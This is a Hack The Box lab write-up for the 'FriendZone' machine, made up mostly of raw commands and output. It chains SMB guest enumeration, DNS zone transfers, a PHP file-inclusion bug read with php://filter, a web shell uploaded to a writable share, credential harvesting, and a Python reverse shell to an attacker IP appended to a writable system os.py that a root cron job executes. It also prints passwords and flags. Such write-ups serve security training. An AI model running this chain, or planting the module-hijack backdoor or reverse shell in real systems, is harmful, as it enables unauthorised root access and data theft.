FriendZone
Tue, 24 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.123 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 47601 closed tcp ports (reset), 17927 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2024-09-22T22:40:11+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-09-22T19:40:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.94 seconds
curl 10.10.10.123
<title>Friend Zone Escape software</title>
<center><h2>Have you ever been friendzoned ?</h2></center>
<center><img src="fz.jpg"></center>
<center><h2>if yes, try to get out of this zone ;)</h2></center>
<center><h2>Call us at : +999999999</h2></center>
<center><h2>Email us at: info@friendzoneportal.red</h2></center>
curl 10.10.10.123 -I
HTTP/1.1 200 OK
Date: Sun, 22 Sep 2024 19:45:00 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Fri, 05 Oct 2018 22:52:00 GMT
ETag: "144-577831e9005e6"
Accept-Ranges: bytes
Content-Length: 324
Vary: Accept-Encoding
Content-Type: text/html
crackmapexec smb 10.10.10.123 -u 'guest' -p '' --shares
SMB 10.10.10.123 445 FRIENDZONE [*] Windows 6.1 (name:FRIENDZONE) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.10.123 445 FRIENDZONE [+] \guest:
SMB 10.10.10.123 445 FRIENDZONE [+] Enumerated shares
SMB 10.10.10.123 445 FRIENDZONE Share Permissions Remark
SMB 10.10.10.123 445 FRIENDZONE ----- ----------- ------
SMB 10.10.10.123 445 FRIENDZONE print$ Printer Drivers
SMB 10.10.10.123 445 FRIENDZONE Files FriendZone Samba Server Files /etc/Files
SMB 10.10.10.123 445 FRIENDZONE general READ FriendZone Samba Server Files
SMB 10.10.10.123 445 FRIENDZONE Development READ,WRITE FriendZone Samba Server Files
SMB 10.10.10.123 445 FRIENDZONE IPC$ IPC Service (FriendZone server (Samba, Ubuntu)
impacket-smbclient guest@10.10.10.123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# shares
print$
Files
general
Development
IPC$
# use general
# tree
/creds.txt
Finished - 0 files and folders
# cat /creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
# shares
print$
Files
general
Development
IPC$
# use Development
# tree
Finished - 0 files and folders
#
sudo nano /etc/hosts
10.10.10.123 friendzone.red friendzoneportal.red
dig axfr @friendzone.red friendzone.red
; <<>> DiG 9.20.1-1-Debian <<>> axfr @friendzone.red friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 148 msec
;; SERVER: 10.10.10.123#53(friendzone.red) (TCP)
;; WHEN: Mon Sep 23 00:43:20 BST 2024
;; XFR size: 8 records (messages 1, bytes 289)
dig axfr @friendzoneportal.red friendzoneportal.red
; <<>> DiG 9.20.1-1-Debian <<>> axfr @friendzoneportal.red friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.123#53(friendzoneportal.red) (TCP)
;; WHEN: Mon Sep 23 00:45:38 BST 2024
;; XFR size: 9 records (messages 1, bytes 309)
curl https://admin.friendzoneportal.red/ -k
<title>Admin Page</title>
<center><h2>Login and break some friendzones !</h2></center>
<center><h2>Spread the love !</h2></center>
<center>
<form name="login" method="POST" action="login.php">
<p>Username : <input type="text" name="username"></p>
<p>Password : <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>
</form>
</center>
<form>
https://admin.friendzoneportal.red/login.php
admin:WORKWORKHhallelujah@#
<h1>Admin page is not developed yet !!! check for another one</h1>
curl https://administrator1.friendzone.red/ -k
<head>
<title>FriendZone Corp Administrator login page</title>
</head>
<body>
<br><br>
<center><h2>Login Form for FriendZone</h2></center>
<div class="login-page">
<div class="form">
<form class="register-form">
<input type="text" placeholder="name"/>
<input type="password" placeholder="password"/>
<input type="text" placeholder="email address"/>
<button>create</button>
<p class="message">Already registered? <a href="#">Sign In</a></p>
</form>
<form method="POST" action="login.php" name="Login" class="login-form">
<input type="text" name="username" placeholder="username"/>
<input type="password" name="password" placeholder="password"/>
<button>login</button>
</form>
</div>
</div>
https://administrator1.friendzone.red/login.php
admin:WORKWORKHhallelujah@#
Login Done ! visit /dashboard.php
https://administrator1.friendzone.red/dashboard.php
<html>
<head>
<title>FriendZone Admin !</title>
</head>
<body>
<br><br><br>
<center>
<h2>Smart photo script for friendzone corp !</h2>
</center>
<center>
<h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3>
</center>
<br><br>
<center>
<p>image_name param is missed !</p>
</center>
<center>
<p>please enter it to show the image</p>
</center>
<center>
<p>default is image_id=a.jpg&pagename=timestamp</p>
</center>
</body>
</html>
ffuf -u 'https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=FUZZ' -v \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-H "Cookie: FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" \
-of html -o ~/ffufreport-lfi \
-mc 200 -fs 354 -fw 0 \
| sed -e 's/| URL | //g' -e '/\* FUZZ:/d';
echo "\nReport: file:///home/$USER/ffufreport-lfi"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Header : Cookie: FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1
:: Output file : /home/daddybigfish/ffufreport-lfi
:: File format : html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
:: Filter : Response size: 354
:: Filter : Response words: 0
________________________________________________
[Status: 200, Size: 866, Words: 38, Lines: 1, Duration: 25ms]
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login
[Status: 200, Size: 1914, Words: 38, Lines: 1, Duration: 22ms]
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
https://...&pagename=php://filter/convert.base64-encode/resource=login
PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K
echo 'PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K' | base64 -d
<?php
$username = $_POST["username"];
$password = $_POST["password"];
//echo $username === "admin";
//echo strcmp($username,"admin");
if ($username==="admin" and $password==="WORKWORKHhallelujah@#"){
setcookie("FriendZoneAuth", "e7749d0f4b4da5d03e6e9196fd1d18f1", time() + (86400 * 30)); // 86400 = 1 day
echo "Login Done ! visit /dashboard.php";
}else{
echo "Wrong !";
}
?>
https://...&pagename=php://filter/convert.base64-encode/resource=dashboard
PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=
echo 'PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=' | base64 -d
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
echo "<br><br><br>";
echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
if(!isset($_GET["image_id"])){
echo "<br><br>";
echo "<center><p>image_name param is missed !</p></center>";
echo "<center><p>please enter it to show the image</p></center>";
echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
}else{
$image = $_GET["image_id"];
echo "<center><img src='images/$image'></center>";
echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
include($_GET["pagename"].".php");
//echo $_GET["pagename"];
}
}else{
echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
FriendZone Samba Server Files /etc/Files
impacket-smbclient guest@10.10.10.123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# use Development
# put shell.php
# tree
/shell.php
Finished - 0 files and folders
https://...&pagename=/etc/Development/shell
ls ../var/www
admin
friendzone
friendzoneportal
friendzoneportaladmin
html
mysql_data.conf
uploads
cat ../var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
friend:Agpyu12!0.213$
ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ED25519 key fingerprint is SHA256:ERMyoo9aM0mxdTvIh0kooJS+m3GwJr6Q51AG9/gTYx4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
791570d477a7a68e88041b524787b348
friend@FriendZone:~$ curl 10.10.16.7:8088/linpeas.sh
Command 'curl' not found, but can be installed with:
apt install curl
Please ask your administrator.
friend@FriendZone:~$ wget 10.10.16.7:8088/linpeas.sh
--2024-09-23 23:52:40-- http://10.10.16.7:8088/linpeas.sh
Connecting to 10.10.16.7:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[========================================================>] 828.05K 1.06MB/s in 0.8s
2024-09-23 23:52:41 (1.06 MB/s) - ‘linpeas.sh’ saved [847920/847920]
friend@FriendZone:~$ bash linpeas.sh
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 437 0.0 0.3 31320 3308 ? Ss 02:17 0:00 /usr/sbin/cron -f
root 2162 0.0 0.3 58792 3160 ? S 03:26 0:00 _ /usr/sbin/CRON -f
root 2163 0.0 0.0 4628 820 ? Ss 03:26 0:00 | _ /bin/sh -c /opt/server_admin/reporter.py
root 2164 0.0 0.9 32420 8652 ? S 03:26 0:00 | _ /usr/bin/python /opt/server_admin/reporter.py
root 2165 0.0 0.4 21472 3800 ? S 03:26 0:00 | _ /bin/bash -i
root 2177 0.0 0.3 58792 3160 ? S 03:28 0:00 _ /usr/sbin/CRON -f
root 2178 0.0 0.0 4628 916 ? Ss 03:28 0:00 | _ /bin/sh -c /opt/server_admin/reporter.py
root 2179 0.0 0.9 32420 8352 ? S 03:28 0:00 | _ /usr/bin/python /opt/server_admin/reporter.py
root 2180 0.0 0.4 21472 3896 ? S 03:28 0:00 | _ /bin/bash -i
root 2190 0.0 0.3 58792 3160 ? S 03:30 0:00 _ /usr/sbin/CRON -f
root 2191 0.0 0.0 4628 816 ? Ss 03:30 0:00 _ /bin/sh -c /opt/server_admin/reporter.py
root 2192 0.0 0.9 32420 8572 ? S 03:30 0:00 _ /usr/bin/python /opt/server_admin/reporter.py
root 2193 0.0 0.4 21472 3800 ? S 03:30 0:00 _ /bin/bash -i
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/usr/lib/python2.7
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group friend:
/usr/lib/python2.7/os.pyc
friend@FriendZone:~$ nano /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub schedu$
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:/usr/lib/python2.7$ nano os.py
# added to end of file
import socket
import subprocess
import os
# Change these variables to your attacker's IP address and port
ATTACKER_IP = "10.10.16.7"
ATTACKER_PORT = 4435
# Create a socket connection
s = socket.socket()
s.connect((ATTACKER_IP, ATTACKER_PORT))
# Redirect input, output, and error to the socket
os.dup2(s.fileno(), 0) # Standard input (stdin)
os.dup2(s.fileno(), 1) # Standard output (stdout)
os.dup2(s.fileno(), 2) # Standard error (stderr)
# Execute an interactive bash shell
subprocess.call(["/bin/bash", "-i"])
Listening on 0.0.0.0 4435
Connection received on 10.10.10.123 33538
bash: cannot set terminal process group (2163): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~#
root@FriendZone:~# cat /root/root.txt
7a31f7a7992bd6469c38fd7fed8be2d1